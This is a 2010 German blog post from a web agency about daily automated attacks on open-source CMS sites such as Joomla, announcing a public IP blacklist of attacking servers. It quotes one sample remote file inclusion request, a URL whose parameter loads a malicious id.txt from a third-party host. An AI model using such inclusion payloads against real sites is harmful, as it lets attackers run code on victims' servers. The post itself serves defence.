31. Juli 2010

2

Hacker-Angriffe - Schwarze Liste

Jeden Tag laufen über 100 Hacker-Angriffe gegen uns und unsere Kunden.

Die meisten Angriffe kommen von Webservern die gezielt auf Open Source Systeme gehen. Es werden einfach alle möglichen Systeme auf bekannte Sicherheitslücken abgefragt, das sieht dann bei Joomla in etwa so aus:
http://www.redim.de/aktuelle-news/index.php?_request=http://zul.com.pl/mambots/system/id.txt???

 

In der Datei "id.txt" befindet sich dann der Schadcode. Das schlimme ist, dass sich auf jeder gehackten Webseite Schadcode befinden kann, deswegen sollte jeder der ein Open Source System benutzt, ab und zu mal seinen Webspace auf komische Files durchsuchen. Da uns diese Angriffe so langsam echt nerven haben wir einen Script programmiert der diese Angriffe registriert und die Server-IP´s speichert.

Diese IP´s geben wir ab heute jeden Tag aktualisiert auf einer Liste aus.

Die Liste gibt es hier: http://hack.redim.de/blacklist.html

Jetzt müssen Sie nur noch diese IP´s blocken und schon ist Ihre Webseite oder Ihr Server etwas sicherer!

Sollte Ihr Server unberechtigt auf der Liste sein, melden Sie sich bei uns. Wir prüfen das und entfernen die IP dann wieder wenn alles in Ordnung ist.



 

 

Bookmarks

Add to: Facebook Add to: Mr. Wong Add to: Webnews Add to: Icio Add to: Favoriten.de Add to: Seekxl Add to: Social Bookmark Portal Add to: BoniTrust Add to: Yigg Add to: Linkarena Add to: Spurl Add to: Blinklist Information